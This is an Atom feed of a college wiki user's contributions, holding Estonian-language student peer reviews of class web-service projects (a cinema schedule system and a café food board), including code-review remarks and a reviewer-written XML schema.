<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="en">
	<id>https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tliiv</id>
	<title>ICO wiki - User contributions [en]</title>
	<link rel="self" type="application/atom+xml" href="https://wiki.itcollege.ee/api.php?action=feedcontributions&amp;feedformat=atom&amp;user=Tliiv"/>
	<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php/Special:Contributions/Tliiv"/>
	<updated>2026-05-08T04:03:56Z</updated>
	<subtitle>User contributions</subtitle>
	<generator>MediaWiki 1.45.1</generator>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33859</id>
		<title>Talk:Meeskond &quot;Tyhik&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Tyhik%22&amp;diff=33859"/>
		<updated>2011-06-06T10:11:28Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Kokkuvõttev arvustus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;&amp;lt;pre&amp;gt;&lt;br /&gt;
Arvustus&lt;br /&gt;
&lt;br /&gt;
Meeskonna Tyhik loodud kinokavade xml faili struktuur on nõuetekohane, kenasti stiilis &lt;br /&gt;
&amp;lt;kinod&amp;gt;&lt;br /&gt;
   &amp;lt;kino&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
ning &lt;br /&gt;
&amp;lt;filmid&amp;gt;&lt;br /&gt;
   &amp;lt;film&amp;gt;&lt;br /&gt;
      ...&lt;br /&gt;
Stiili- ja abifailid on olemas ning kui ma neid läbi vaatasin, siis vigu ei tuvastanud.&lt;br /&gt;
Lehe esialgne kujundus on hea, mulle meeldib.&lt;br /&gt;
Kokkuvõttes: minu arvates hea raam, millele veebirakendus ümber ehitada.&lt;br /&gt;
&lt;br /&gt;
Indrek Tamm, meeskond Tool, 4.III.2011&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Võib öelda, et XML on väga põhjalik ja seal on kajastatud kõik andmed, mis kinokülastajale huvi võiksid pakkuda. Isiklikult ei leidnudki kohta, kus oleks tahtnud midagi teistmoodi teha. Sellise XML põhjal on kindlasti võimalik korralik teenus ja klientrakendus ehitada. Samuti on olemas skeemifail ja korralik XSLT, mis esitab andmeid vägagi loetaval ja ülevaatlikul kujul.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver, D21&lt;br /&gt;
&lt;br /&gt;
Uurides XML, uurisin mis uurisin aga ei oska kohe midagi ette heita. XML fail tundub ilusti struktureeritud, ja paistab et on olemas ka kõik vajalikud asjad, mis kinosüsteemis peaksolemas olema. Kõik failid on korralikult loetaavad ja arusaamisega probleeme ei teki. Lihtne ülesehitus.&lt;br /&gt;
&lt;br /&gt;
Jaak Lehtsalu D22&lt;br /&gt;
&lt;br /&gt;
XML fail keskendub elementidele, struktuur on loogiline. Andmed hoitakse võimalikult detailselt, nii et midagi halba pole öelda. Skeemifailis on seatud elementidele vastavusse andmetüübid, mida neis hoitakse, korralik töö. Stiilifail mitte ainult ei loe lihtsalt XMLi elementide sisu vaid paneb need ka stiliseeritud tabelisse, mis parandab loetavust. Tore oleks tõesti sait, kust kerge kinodes toimuvast infot saada ning see on hea põhi sellise teenuse loomiseks.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
Väga põhjalik XML fail ning väga hästi ülesehitatud stiilifail. Kõik vajalik on olemas ning veel lisaks ka muudki.&lt;br /&gt;
&lt;br /&gt;
Nimetused oleks võinud teistmoodi üles ehitada. Seal on olemas originaal ning tõlgitud filmi nimi, kuid sinna võiks olla võimalik lisada ka muid keeli. Kuigi kui rakendus jääbki ainult eesti keelseks siis pole vahet.&lt;br /&gt;
&lt;br /&gt;
Jarko Kaskmaa D21&lt;br /&gt;
&lt;br /&gt;
XML fail on ülesehituse poolest põhjalik. Nõuded on täidetud ja struktrueering paigas. Stiilifail samuti soliidne ja põhjalik. Etteheiteid puuduvad.&lt;br /&gt;
&lt;br /&gt;
Indrek Kruuser&lt;br /&gt;
&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Teenuse arvamus&lt;br /&gt;
&lt;br /&gt;
Erinevaid teenuseid tundub olevat piisavalt palju, et antud veebiteenusele&lt;br /&gt;
saaks ehitada ühe korraliku ja kasuliku rakenduse. &lt;br /&gt;
Natuke tekitavad kahtlused näitkes võta hind, kustuta hind - mille jaoks neid vaja on?&lt;br /&gt;
Kui see käib mingi seansi kohta, siis võiks see olla näiteks filmi objekti küljes&lt;br /&gt;
koos teiste filmi parameetritega. Kui liiga palju meetoteid on, pole ka alati hea.&lt;br /&gt;
Aga samas, see on minu arvamus. Edu!&lt;br /&gt;
&lt;br /&gt;
Taavi Ilves D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Tegelikult saab filmi küsimise meetodile öelda, kas ta annab ka alamobjektid (hind, zanr, inimesed jne) või mitte. &lt;br /&gt;
Eraldi ongi sellepärast, et saaks küsida ainult filmi kohta infot. Pannes üheks parameetriks &amp;quot;true&amp;quot;, siis pistetakse&lt;br /&gt;
hind filmi objekti külge. Samas on vaja hinda eraldi pärida näiteks kino hinnakirja genereerimiseks. Ning hindasid&lt;br /&gt;
peab saama eraldi ka kustutada, kuna hinnad ei ole ju jäigalt seotud filmiga vaid ikka kinoga.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Teenuseid on korralik hulk, kuid Eestikeelsed API nimed ei ole arusaadavad välismaalastele. Segadust tekitab veel &amp;quot;anna*&amp;quot; ja &amp;quot;võta*&amp;quot;, kas mina annan talle ja ta võtab, või võtab tema ja annab mulle - nimi peaks ütleme kohe mis suunas liiklus käib. Tundub et mõned päringud saaks kokku &#039;&#039;mergeda&#039;&#039;, näiteks annaFilmid ja annaFilmidNimi. Üldiselt aga on kena :)&lt;br /&gt;
&lt;br /&gt;
-Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Esimese asjana hakkas silma, et te olete iga päringu tüübi jaoks teinud eraldi teenuse. Minu arvates koodi loetavuse mõttes on see hea, aga teenust ennast oleks mugavam kasutada kui kõik meetodid oleks üheks teenuseks koondatud.&lt;br /&gt;
Üldiselt tundub, et teenusel on olemas kõikvõimalikud meetodid, mida vaja võiks minna. Positiivne on, et peaaegu kõigil meetoditel on olemas ka kirjeldus, et mida see teeb ning mis parameetreid vajab.&lt;br /&gt;
Projektiga võiksite .sln või vähemalt .csproj failid ka kaasa panna, et visual studios parem vaadata oleks ning käivitada saaks.&lt;br /&gt;
&lt;br /&gt;
Siim Aaver D21&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
Vastus: &lt;br /&gt;
&lt;br /&gt;
Üks põhjus, miks jagasime tükkideks oligi loetavus. Teine põhjus on see, et kui keegi peaks avaldama soovi rakenduse tegemiseks meie teenusele, siis saame anda ligipääsu ainult &amp;quot;AnnaTeenus&amp;quot;-ele. Kui keegi teeb lihtsalt kinokava kuvamise rakenduse, siis pole tal vaja ei lisamise ega kustutamise teenust/meetodeid näha.&lt;br /&gt;
&lt;br /&gt;
Aga täname arvamuse eest :)&lt;br /&gt;
&lt;br /&gt;
Kert Suvi D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Teenuse arvustus&lt;br /&gt;
&lt;br /&gt;
Wiki lehel on teenuse all välja toodud kõik meetodid, aga pole ühelegile meetodile juurde kirjutatud mida too teeb, aga mis on hea - kui lähtekoodi uurida siis seal on iga meetodi juures ära kirjeldatud, mida too teeb ja mida ta tagastab. Lisaks häirib kasutatud &amp;quot;estenglish&amp;quot; kasutamine lähtekoodis, st meetodi nimed on eesti keelsed. Üldiselt kood on loetav ja ilusti struktureeritud.&lt;br /&gt;
&lt;br /&gt;
Toomas Soha D21&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Teenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Nõuded teenuse osas on täidetud. Teenuste hulk on suur ja positiivne nähtus on koodi kommenteerimine. Struktrueering loogiliselt ülesehitatud. Teenuse osas etteheited puuduvad.&lt;br /&gt;
&lt;br /&gt;
Indrek Kruuser&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Kuna viibin hetkel arvuti taga kus ma ei saa visual studiot kasutada siis ei saa  nii täpset arvustust anda(nägin teie esitust klassis). Tahaks öelda mis häirib on see, et meetoid ja asjad on eestikeelsed. Rohkem oleksite võinud kommenteerida ka, kuigi esmapilgul tundus kõik suhteliselt arusaadav. Muidu on idee täitsa hea ja kindlasti seda täiendades saaks täiesti reaalselt kasutatava rakenduse ;) &lt;br /&gt;
&lt;br /&gt;
Madis Sildaru D32&lt;br /&gt;
&lt;br /&gt;
==Arvustus veebiteenuse klientidele==&lt;br /&gt;
&lt;br /&gt;
Esitluse ajal tundus kõik kenasti töötavat. Adminipool funktsioneeris ja täitis nõutud nõuded. Disain ja kasutajamugavus oli arvestatav. Mina isklikult olin tulemtustega rahul.&lt;br /&gt;
&lt;br /&gt;
Indrek Kruuser&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
Esiteks ei ole projektil kaasas solution faili, VS ei oska sortsuga ilma selleta midagi peale hakata. Kuna loen faile Notepad++&#039;sis siis, virisen peaasjalikult sortsu kallal :)&lt;br /&gt;
*Sorts on eesti keeles :/&lt;br /&gt;
*Int32.Parse(Request.QueryString[&amp;quot;id&amp;quot;]); stiilis asjad peaks olema try-catch ploki sees.&lt;br /&gt;
* Üldse kogu see data komplekteerimine on väga mitte OOP: kisute ühe andmestruktuuri lahti ja lisati tema objektid kõik eraldi teistesse objektidesse ning siis söödate need objektid alles kuvamise loogikasse. Võiks ju kohe (nt. film.inimesed) Repeaterisse sööta. &lt;br /&gt;
*Kinokava.aspx.cs: treppimine on vale&lt;br /&gt;
*Response.Redirect(&amp;quot;Kinokava.aspx?id=&amp;quot; + id + &amp;quot;&amp;amp;paev=&amp;quot; + paev + &amp;quot;&amp;amp;kuu=&amp;quot; + kuu + &amp;quot;&amp;amp;aasta=&amp;quot; + aasta); selline URI ehitamine võiks näiteks eraldi meetod olla juba, niimoodi on inetu.&lt;br /&gt;
*Kommentaarid puuduvad koodis.&lt;br /&gt;
&lt;br /&gt;
Need olid peamised möödalaskmised mis silma hakkasid. Suures pildis on kena :)&lt;br /&gt;
&lt;br /&gt;
Tanel Liiv D22&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Kino teema on väga huvitav ja hea teema. Proovisin ka ise midagi sellist ühe teise aine raames teha.&lt;br /&gt;
&lt;br /&gt;
Lisan siia, kuidas mulle meeldib koodi kirjutada (mitte mis valesti on):&lt;br /&gt;
&lt;br /&gt;
Vähegi suurema projekti puhul ei kasutaks linq&#039;t, kuna ta genereerib palju tarbetud koodi. Kui ma ei eksi, siis teil on hetkel nii linq kui oma loodud klassid. Andmebaasist kustutamise arvelt saaks palju kokku hoida, kuna tegelikult on ju parem kui jääb kõik ajalugu alles. Filmi / kino saab lihtsalt märkida suletuks. &lt;br /&gt;
Mida suurem projekt, seda rohkem tuleb klasse nagunii, seega ma ei teeks igale suvalisele väärtusele klassi, vaid realiseeriks täpselt niipalju meetodeid, kui parasjagu tarvis läheb. Samuti, kui vähegi võimalik, koondaks ühe teema funktsioonid ühte klassi (n: select, insert, delete jne).&lt;br /&gt;
&lt;br /&gt;
Kliendi pool oli lahedalt kujundatud ja ka repeaterite kasutamine oli hea mõte. &lt;br /&gt;
Ma kasutaks ka webUserControl elemente, siis ei peaks nii palju erinevaid lehti tegema ja saaks ka teinekord kasutada.&lt;br /&gt;
&lt;br /&gt;
PS! Seda, ma tulin teie projekti hindama lootuses, et saan mõne hea kommenteerimis vihje aga... &lt;br /&gt;
ei saa öelda, et ma just palju kommentaare oleks leidnud  :)&lt;br /&gt;
&lt;br /&gt;
Priit Siimo&lt;br /&gt;
&lt;br /&gt;
===Veebiteenuse arvustus===&lt;br /&gt;
&lt;br /&gt;
Teenuse aluseks olev andmebaas on lihtne ja hea. Vajalikud lisaseosed on loodud. Teenuse meetodite hulk on suur ning see on mõistetav, kui tegu on nii rohkelt infot nõudva valdkonna käsitlusega. Kood teenuses on kommenteeritud ja meetodid ise võimalikult erinevates klassides. Lihtne lugeda ja mõista, mis kus asub. Hästi tehtud.&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
===Klientrakenduse arvustus===&lt;br /&gt;
&lt;br /&gt;
Esmalt kiidusõnad graafilise poole eest. Vaeva on nähtud lehe disainimisega ning seda on hea näha. Mõistmatuks jäi pordi määramise vajalikkus, ehk annab seda vähe rohkem selgitada. Lehe funktsionaalsus oli mulle meeltmööda ning funktsioonid töötasid kenasti. Oli üks katkine link... sitemap. Aga selge see, et rakenduse ja teenuse toimimise näitas tehtu kenasti ära. Rakenduse eesmärk igati täidetud ja hindeks annaksin 5 (pluss jääb ära katkise lingi tõttu).&lt;br /&gt;
&lt;br /&gt;
Reigo Männiste D22&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Meeskond valis hea teema. Kino infosüsteemi on kindlasti midagi, mida saaks ka reaalselt kasutada, muidugi kui kõik väga korralikult teha ning rakendust piisavalt siluda. Samas oleks võinud selle teema kohta alguses wikis ka natuke juttu olla, et  millist lõpptulemust oodatakse, millise funktsionaalsusega ning mis rakendustega.&lt;br /&gt;
&lt;br /&gt;
XML tehti igati korralikult nagu ka teenusekiht, kus kõik teemade kaupa ilusasti ära oli jagatud. Rakenduse puhul meeldis mulle välimus, mis jäi kohe positiivse asjan silma. On küll sees väiksemaid buge, kuid põhifunktsionaalsus paistab töötavat.&lt;br /&gt;
&lt;br /&gt;
Meeskonna toimimise poole pealt on hea näha seda, et võeti kasutusele teises aines õpitud ekstreemprogrammeerimise praktika, et rakendust tõhusamalt ehitada. Lisaks tehti enamus asju ühiselt valmis, seega ilmselt kõik meeskonnaliikmeid panustasid korralikult lõpptulemusele.&lt;br /&gt;
&lt;br /&gt;
Kui jätta välja teine klientrakendus, siis tundub, et kõik nõuded said täidetud, muidugi wiki oleks võinud natuke põhjalikum olla. Aga vaadates üldist projektide taset, siis igati korralik tulemus !&lt;br /&gt;
&lt;br /&gt;
Rauno Rüga, D21&lt;br /&gt;
&lt;br /&gt;
[[User:Rruga|Rruga]]&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Kinokavade süsteem on väga huvitav valik. Wikis olev info maht on peaaegu sobiv - puudu jääb ehk vaid detailsemast süsteemiloogikast. Näiteks oleksin huvitatud lugemast täpsemalt kliendi andmevahetuse protokollist.&lt;br /&gt;
&lt;br /&gt;
XML on üldiselt korralik, kuid wikis seisab punkt et süsteem toeta vaid ühte filmi, kas see on iganenud väide või on asi tõesti niimoodi? Mõlemad variandid ei ole eriti kiiduväärt. API on suures plaanis kena, küll aga ei meeldi see &amp;quot;võta&amp;quot; vs. &amp;quot;anna&amp;quot; nimede valik...API meetodite nimed peaks olema ikka nii iseenesestmõistetavad kui vähegi võimalik. &lt;br /&gt;
&lt;br /&gt;
Meeskonnatöö tundub ka huvitav, punktide jaotus on kenasti lineaarne -  hea et aus ollakse. Kuigi liikmeid oli piisavalt ei saadud siiski valmis teise klientrakendusega - võibolla sellepärast et punktide jaotusest tundub et arendajate arv oli projektis siiski väike ja nad lihtsalt ei jõudnud ise kõike valmis koodida.&lt;br /&gt;
&lt;br /&gt;
Kurb oli ka kuulda et projekti arendamisel ei kasutatud versioonihaldust. See oleks olnud VÄGA vajalik kogemus kõikidele.&lt;br /&gt;
&lt;br /&gt;
Need aga on väikesed möödalaskmised, üldiselt on normaalne projekt :)&lt;br /&gt;
&lt;br /&gt;
PS! On tore näha et kasutati agiilseid arendusmeetodeid, eriti just paarisprogrammeerimist.&lt;br /&gt;
&lt;br /&gt;
Tanel Liiv(D22)&lt;br /&gt;
&lt;br /&gt;
===Kokkuvõttev arvustus===&lt;br /&gt;
&lt;br /&gt;
Tehtud töö on täitnud ilusasti nõuded. Valikud realiseerimisel ja esitlemisel on tehtud targalt. Kood on kommenteeritud, see võimaldab tervikpilti kogulahendusest tunduvalt kiiremini luua kui mõne teise projekti puhul. Üldise välimusega võib rahule jääda ja suuremaid etteheiteid pole. Lõpptulemust annab rakendada ka tavaellu. &lt;br /&gt;
&lt;br /&gt;
Indrek Kruuser&lt;/div&gt;</summary>
		<author><name>Tliiv</name></author>
	</entry>
	<entry>
		<id>https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33852</id>
		<title>Talk:Meeskond &quot;Hungry Student Food Board&quot;</title>
		<link rel="alternate" type="text/html" href="https://wiki.itcollege.ee/index.php?title=Talk:Meeskond_%22Hungry_Student_Food_Board%22&amp;diff=33852"/>
		<updated>2011-06-06T10:02:20Z</updated>

		<summary type="html">&lt;p&gt;Tliiv: /* Rakenduse arvustus */&lt;/p&gt;
&lt;hr /&gt;
&lt;div&gt;== Arvustus XML-ile ==&lt;br /&gt;
XML on koostatud korrektselt. &amp;lt;br /&amp;gt;&lt;br /&gt;
&amp;lt;br /&amp;gt;Natuke &amp;quot;tähenärimist&amp;quot;: &amp;lt;!-- kuigi tähenärimine rikub hambaid, nagu juhtivad hambaarstid kinnidavad :P --&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* &amp;quot;kehtib&amp;quot; tagide asemel võiks olla &amp;quot;viimati ajakohastatud&amp;quot; ehk &amp;quot;updated&amp;quot; ja kui on plaanis tulevikus mitte eestikeelseid tegijaid ligi lasta, võiks kõik tag-id olla inglisekeelsed. Näiteks kui &amp;quot;konkureeriv firma&amp;quot; tahab ka neid andmeid mingil viisil oma klientidele kuvada. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
XML&#039;i ennast on raske hinnata. Tuleks vaadata, kas XML vastab schemale ja kui vastab, siis hinnata schema faili, sest see on ülevaatlikum. Eraldi schema faili ei suutnud ma leida. Tegin siis ise ühe. &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* Schema visuaalselt &amp;lt;br /&amp;gt;&lt;br /&gt;
[[File:HSFB schema.png]] &amp;lt;br /&amp;gt;&lt;br /&gt;
&lt;br /&gt;
* ning sellele vastav kood&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;?xml version=&amp;quot;1.0&amp;quot; encoding=&amp;quot;utf-8&amp;quot;?&amp;gt;&lt;br /&gt;
&amp;lt;xs:schema xmlns:xsi=&amp;quot;http://www.w3.org/2001/XMLSchema-instance&amp;quot; attributeFormDefault=&amp;quot;unqualified&amp;quot; elementFormDefault=&amp;quot;qualified&amp;quot; xmlns:xs=&amp;quot;http://www.w3.org/2001/XMLSchema&amp;quot;&amp;gt;&lt;br /&gt;
  &amp;lt;xs:element name=&amp;quot;kohvikud&amp;quot;&amp;gt;&lt;br /&gt;
    &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
      &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
        &amp;lt;xs:element maxOccurs=&amp;quot;unbounded&amp;quot; name=&amp;quot;kohvik&amp;quot;&amp;gt;&lt;br /&gt;
          &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
            &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
              &amp;lt;xs:element maxOccurs=&amp;quot;unbounded&amp;quot; name=&amp;quot;toit&amp;quot;&amp;gt;&lt;br /&gt;
                &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
                  &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;pilt&amp;quot;&amp;gt;&lt;br /&gt;
                      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
                        &amp;lt;xs:sequence&amp;gt;&lt;br /&gt;
                          &amp;lt;xs:element name=&amp;quot;url&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
                              &amp;lt;xs:simpleContent&amp;gt;&lt;br /&gt;
                                &amp;lt;xs:extension base=&amp;quot;xs:string&amp;quot;&amp;gt;&lt;br /&gt;
                                  &amp;lt;xs:attribute name=&amp;quot;width&amp;quot; type=&amp;quot;xs:unsignedByte&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                                  &amp;lt;xs:attribute name=&amp;quot;height&amp;quot; type=&amp;quot;xs:unsignedByte&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                                &amp;lt;/xs:extension&amp;gt;&lt;br /&gt;
                              &amp;lt;/xs:simpleContent&amp;gt;&lt;br /&gt;
                            &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
                          &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
                        &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
                      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
                    &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;pealkiri&amp;quot; type=&amp;quot;xs:string&amp;quot; /&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;kirjeldus&amp;quot; type=&amp;quot;xs:string&amp;quot; /&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;poolhind&amp;quot;&amp;gt;&lt;br /&gt;
                      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
                        &amp;lt;xs:simpleContent&amp;gt;&lt;br /&gt;
                          &amp;lt;xs:extension base=&amp;quot;xs:unsignedByte&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;xs:attribute name=&amp;quot;valuuta&amp;quot; type=&amp;quot;xs:string&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                            &amp;lt;xs:attribute name=&amp;quot;rate&amp;quot; type=&amp;quot;xs:decimal&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                          &amp;lt;/xs:extension&amp;gt;&lt;br /&gt;
                        &amp;lt;/xs:simpleContent&amp;gt;&lt;br /&gt;
                      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
                    &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;tervehind&amp;quot;&amp;gt;&lt;br /&gt;
                      &amp;lt;xs:complexType&amp;gt;&lt;br /&gt;
                        &amp;lt;xs:simpleContent&amp;gt;&lt;br /&gt;
                          &amp;lt;xs:extension base=&amp;quot;xs:unsignedShort&amp;quot;&amp;gt;&lt;br /&gt;
                            &amp;lt;xs:attribute name=&amp;quot;valuuta&amp;quot; type=&amp;quot;xs:string&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                            &amp;lt;xs:attribute name=&amp;quot;rate&amp;quot; type=&amp;quot;xs:decimal&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                          &amp;lt;/xs:extension&amp;gt;&lt;br /&gt;
                        &amp;lt;/xs:simpleContent&amp;gt;&lt;br /&gt;
                      &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
                    &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;allahindlus&amp;quot; type=&amp;quot;xs:string&amp;quot; /&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;kehtib&amp;quot; type=&amp;quot;xs:string&amp;quot; /&amp;gt;&lt;br /&gt;
                    &amp;lt;xs:element name=&amp;quot;liked&amp;quot; type=&amp;quot;xs:unsignedByte&amp;quot; /&amp;gt;&lt;br /&gt;
                  &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
                  &amp;lt;xs:attribute name=&amp;quot;tyyp&amp;quot; type=&amp;quot;xs:string&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
                &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
              &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
            &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
            &amp;lt;xs:attribute name=&amp;quot;name&amp;quot; type=&amp;quot;xs:string&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
            &amp;lt;xs:attribute name=&amp;quot;staatus&amp;quot; type=&amp;quot;xs:string&amp;quot; use=&amp;quot;required&amp;quot; /&amp;gt;&lt;br /&gt;
          &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
        &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
      &amp;lt;/xs:sequence&amp;gt;&lt;br /&gt;
    &amp;lt;/xs:complexType&amp;gt;&lt;br /&gt;
  &amp;lt;/xs:element&amp;gt;&lt;br /&gt;
&amp;lt;/xs:schema&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
XML on kasutatav mitmete erinevate kohvikute puhul. Pisut arusaamatu on staatus tagide olemasolu, kas mõeldud on ka mittetegutsevate kohvikute andmete kuvamist?  XML-i loojad on ette näinud erinevate suurustega portsjonite pakkumise võimaluse. Samuti on olemas otse XML-is viide pakutava toote fotole. Olemas on ka võimalus kasutaja poolse tagasiside, hinnete kujul, edastamiseks. Kehtib silt oletan, et on mõeldud näitamaks millal infot viimati uuendati. &lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
--[[User:Htamm|Htamm]] 23:13, 20 March 2011 (EET) &lt;br /&gt;
&lt;br /&gt;
----&lt;br /&gt;
Heiki&lt;br /&gt;
 &lt;br /&gt;
Tänud sulle korraliku tagasiside eest. Staatus on mõeldud kohvikule &amp;quot;tweetimiseks&amp;quot; nt päevapakkumine või miski muu random info kuvamiseks. Süsteem on tõepoolest mõeldud mitmele kohvikule, mitte ühe tarkvara asendamine ühele kohvikule. Esialgne programm on tõepoolest mõeldud Eesti turule, Internatsionaliseerimist peaks tõepoolest algusest saadik programmi sisse planeerima, kuid esialgu ei näe, et meie kohvikute toode müüki läheks, kuid rakendame seda põhimõtet meie firmas.&lt;br /&gt;
&lt;br /&gt;
Jaan Kruusma&lt;br /&gt;
----&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
&lt;br /&gt;
= &#039;&#039;Arvustus veebitenusele&#039;&#039; =&lt;br /&gt;
----------------------&lt;br /&gt;
Teenus on põhjalikult ja korralikult tehtud. Olulist rolli mängib ka disain, mis on ilusti tehtud ja mis mulle meeldis.  Meetodid on kirjeldatud ja andmediagrammis on hästi nähtud, mis millest sõltub. Wikis veebiteenus on lisatud mitte ainult kirjeldamisega, kui ka piltidega, mis annab täeliku ülevaate.&lt;br /&gt;
&lt;br /&gt;
Jana Mrots&lt;br /&gt;
&lt;br /&gt;
== Rakenduse arvustus ==&lt;br /&gt;
&lt;br /&gt;
Esimese positiivse asjana võib kohe välja tuua selle, et on kasutatud MVC3 raamistikku. Kuid wiki lehel polnud olemas juhiseid, kuidas rakendus tööle saada. Otsisin siis MVC3 allalaadimise koha ülesse ja paigaldasin selle ka enda arvutisse.&lt;br /&gt;
&lt;br /&gt;
Kui rääkida sellest, mis puudu siis koodis ei märganud ma kuskil kommentaare. Ilma dokumentatsioonita on raske koodist kiire ülevaade saada. Kuna varem ei ole MVC3-ga kokku puutunud, siis ei saanud koodist suurt midagi aru.&lt;br /&gt;
&lt;br /&gt;
Panin siis rakenduse käima. Tuli ette &amp;quot;häda ja viletsuse mula-tekst&amp;quot; (&#039;&#039;Lorem Ipsum dolor sit amet ...&#039;&#039;). Registreerisin ennast lehel ära, mille järel olin kohe lehele sisse logitud (üleval paremal oli kiri &amp;quot;&#039;&#039;Welcome, Ilmar!&#039;&#039;&amp;quot;). Siis vajutasin menüüribal &amp;quot;Cafes&amp;quot;, mille peale tuli &#039;&#039;Compilation Error&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
 Source File: c:\Users\iLmar\Documents\Visual Studio 2010\Projects\HSFB\HSFB\Views\Cafe\Index.cshtml Line: 91 &lt;br /&gt;
&lt;br /&gt;
[[File:HSFB error.JPG|800px|Vajutasin menüüribal &amp;quot;Cafes&amp;quot;, mille peale tuli Compilation Error.]]&lt;br /&gt;
&lt;br /&gt;
Küsisin skype-i VR2 grupis, kuidas menüüsid näha saaks. Tänaseks ei saanudki abi.&lt;br /&gt;
&lt;br /&gt;
&#039;&#039;&#039;Vastus: Compilation error probleem on elimineeritud. Lorem Ipsum on väga tore :)&#039;&#039;&#039;&lt;br /&gt;
&lt;br /&gt;
[[User:Itelga|Ilmar Telga]] 17:05, 21 May 2011 (EEST)&lt;br /&gt;
&lt;br /&gt;
